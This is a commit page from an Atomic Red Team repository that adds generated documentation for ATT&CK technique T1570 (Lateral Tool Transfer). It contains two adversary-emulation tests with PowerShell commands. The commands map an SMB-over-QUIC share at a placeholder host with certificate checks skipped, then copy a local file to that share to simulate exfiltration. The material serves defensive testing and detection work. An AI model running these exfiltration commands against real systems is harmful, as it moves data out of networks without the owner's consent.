security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2023-07-12 03:00:11 +00:00
parent 0793bc4612
commit 17e2ee6f0e
22 changed files with 220 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1570/T1570.md
+91
View File
@@ -0,0 +1,91 @@
# T1570 - Lateral Tool Transfer
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1570)
<blockquote>Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)
Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095).</blockquote>
## Atomic Tests
- [Atomic Test #1 - Exfiltration Over SMB over QUIC (New-SmbMapping)](#atomic-test-1---exfiltration-over-smb-over-quic-new-smbmapping)
- [Atomic Test #2 - Exfiltration Over SMB over QUIC (NET USE)](#atomic-test-2---exfiltration-over-smb-over-quic-net-use)
<br/>
## Atomic Test #1 - Exfiltration Over SMB over QUIC (New-SmbMapping)
Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
Prerequisites:
- A file server running Windows Server 2022 Datacenter: Azure Edition
- A Windows 11 computer
- Windows Admin Center
**Supported Platforms:** Windows
**auto_generated_guid:** d8d13303-159e-4f33-89f4-9f07812d016f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | The UNC path to the share on the file server | string | &#92;&#92;example.com&#92;sales|
| local_file | The local file to be transferred | path | C:&#92;path&#92;to&#92;file.txt|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-SmbMapping -RemotePath '#{remote_path}' -TransportType QUIC -SkipCertificateCheck
copy '#{local_file}' 'Z:\'
```
<br/>
<br/>
## Atomic Test #2 - Exfiltration Over SMB over QUIC (NET USE)
Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
Prerequisites:
- A file server running Windows Server 2022 Datacenter: Azure Edition
- A Windows 11 computer
- Windows Admin Center
**Supported Platforms:** Windows
**auto_generated_guid:** 183235ca-8e6c-422c-88c2-3aa28c4825d9
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | The UNC path to the share on the file server | string | &#92;&#92;example.com&#92;sales|
| local_file | The local file to be transferred | path | C:&#92;path&#92;to&#92;file.txt|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
NET USE * '#{remote_path}' /TRANSPORT:QUIC /SKIPCERTCHECK
copy '#{local_file}' '*:\'
```
<br/>